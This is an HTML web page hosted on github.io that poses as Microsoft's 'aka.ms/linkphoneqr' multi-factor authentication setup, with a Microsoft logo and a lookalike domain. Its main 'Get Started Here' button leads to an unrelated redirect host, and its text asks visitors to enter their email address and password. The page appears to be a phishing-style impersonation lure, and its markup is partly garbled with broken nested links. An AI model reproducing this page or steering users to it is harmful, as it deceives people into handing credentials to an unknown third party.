<html lang="en">
    <head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-DQTB0CRJYE"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-DQTB0CRJYE');
</script>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name='url' content='https://wwwakamslinkphoneqr.github.io/'>
    <meta name='keywords' content='www.aka.ms/linkphoneqr - Multi-Factor Authentication Online'>
    <meta name='description' content='www.aka.ms/linkphoneqr- (MFA) is a security level that verifies a user's identity by requiring multiple layers of authentication.'>
    <meta name='robots' content='index,follow'>
    <meta property="og:title" content="www.aka.ms/linkphoneqr - Multi-Factor Authentication Online" />
    <meta property="og:description" content="www.aka.ms/linkphoneqr- (MFA) is a security level that verifies a user's identity by requiring multiple layers of authentication." />
    <meta property="og:url" content="https://wwwakamslinkphoneqr.github.io/" />
    <meta property="og:site_name" content="www.aka.ms/linkphoneqr"/>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.12.9/dist/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
        <title>www.aka.ms/linkphoneqr</title>
    <link rel="shortcut icon" href="microsoft-logo.png" type="image/x-icon">
        <style>
            body{
                margin: 0px;
                padding: 0px;
                font-family: 'Times New Roman', Times, serif;
                background-color: #f7f8f9;
                font-size: 1.2rem;
            }
            ul li a{
                color:#000080;
                text-decoration: none;
            }
            h2{
                margin-bottom: 1.5rem;
            }
            .menu{
                display: flex;
                justify-content: space-between;
            }
            #menu{
                background-color:  #b30000;
                color: white;
                padding: 20px;
                display: flex;
                justify-content: space-between;
                
            }
            #menu li{
                list-style-type: none;
                margin: 5px 15px;
            }
            #menu li a{
                text-decoration: none;
                color: white;
                
            } 
            .container .col-md-12{
                background-color: white;
            }
            .button{
                text-decoration: none;
                color: white;
                background-color:  #b30000;
                padding: 1rem 3rem;
                border-radius:30px;
            }
            footer{
                background-color:  #b30000;
                color: white;
                padding: 10px;
            }
            footer a{
                text-decoration: none;
                color: white;
            }
            .center {
                margin: auto;
               padding: 10px;
                text-align:center;
                color: white;
                font-weight: bold;
            }
            
        @media screen and (max-width: 800px) {
            .menu{
                display: none;
            }
        }
        .B{
            background-color: transparent;
            border: none;
            color: white;
            padding: 5px;
        }
            
        </style>
    </head>
    <body>
        <div id="menu">
            <div>
                <p style="font-size: 1.5rem;"><img src="microsoft-logo.png" alt="www.aka.ms/linkphoneqr" style="height:40px; width:40px;">www.aka.ms/linkphoneqr</p>
            </div>
            <div>
                <ul class="menu">
                    <li><a href="https://wwwakamslinkphoneqr.github.io/" class="active">Home</a></li>

                </ul>
            </div>
        </div>
    
        <div class="container">
            
            <div class="row">
                
                <div class="col-md-12 pt-2">
                    <div class="row" style="height: 400px;background: linear-gradient(to top, #8d2e259e, #0e0e0e82), url() no-repeat top center;">
                        <div class="center">
                            <h1>www.aka.ms/linkphoneqr</h1>
                             <br>
                            <a href="https://redir.activateprod.online" class="button">Get Started Here</a>
                        </div>
                    </div>
                    <div class="p-4">
                    <!-- Content -->

<br>
<p>Multi-Factor Authentication Online: Visit the <a style="color:#000080;" href="<a style="color:#000080;" href="https://wwwakamslinkphoneqr.github.io/">www.aka.ms/linkphoneqr</a> link to set up Multi-Factor Authentication.Please Enter your email address and password to login. Click on the next button to provide more information:</p>

<br>
<h2>Setup your preferred method of authentication</h2>

<strong>Multi-Factor Authentication Through Text Message:</strong>
<br>
<br>
<ol>
<li>Please select ‘<a style="color:#000080;" href="<a style="color:#000080;" href="https://wwwakamslinkphoneqr.github.io/">www.aka.ms/linkphoneqr</a>’ from the Drop-Down menu.</li>
<li>Type in your mobile phone number. </li>
<li>This number must be able to get text messages:</li>
<li>Click on the Next button. </li>
<li>You will get a verification text message. </li>
<li>Please Enter the number you get into the enrolment page to confirm this authentication process.</li>
</ol>
<br>

<h2>Multi-Factor Authentication Through Mobile App Push/OAUTH:</h2>
<br>
<ol>
<li>Please select Mobile App from the drop-down menu.</li>
<li>Select Receive notifications for verification</li>
<li>Next, please click on the Set Up button.</li>
<li>Download the <a style="color:#000080;" href="<a style="color:#000080;" href="https://wwwakamslinkphoneqr.github.io/">www.aka.ms/linkphoneqr</a> application on your smartphone via the App Store (iOS) or Play Store (Android).</li>
<li>Start the Microsoft Authenticator app on your smartphone. </li>
<li>Click the + sign to add an account and select “Work or School Account.”</li>
<li>The Microsoft Authenticator application will open your smartphone camera. </li>
<li>Point it at the QR Code given on the page on your computer screen. </li>
<li>This also sets up the device for the Mobile App OAUTH.</li>
</ol>
<br>

<h2>Multi-Factor Authentication By Phone call</h2>
<br>
<ol>
<li>Go to Edit Security Info.</li>
<li>Please select Phone.</li>
<li>Please Enter your mobile or landline number.</li>
<li>Select Call Me and click on the Next button.</li>
<li>Microsoft will call you. Press # to authroize the login</li>
</ol>
<br>


                    </div>
                 
                    
                </div>
                
            </div>
    
        </div>
        <footer class="text-center">
            <p>© 2023 All Rights Reserved <a href="https://wwwakamslinkphoneqr.github.io/">www.aka.ms/linkphoneqr</a></p>
        </footer>
    </body>
    </html>
    
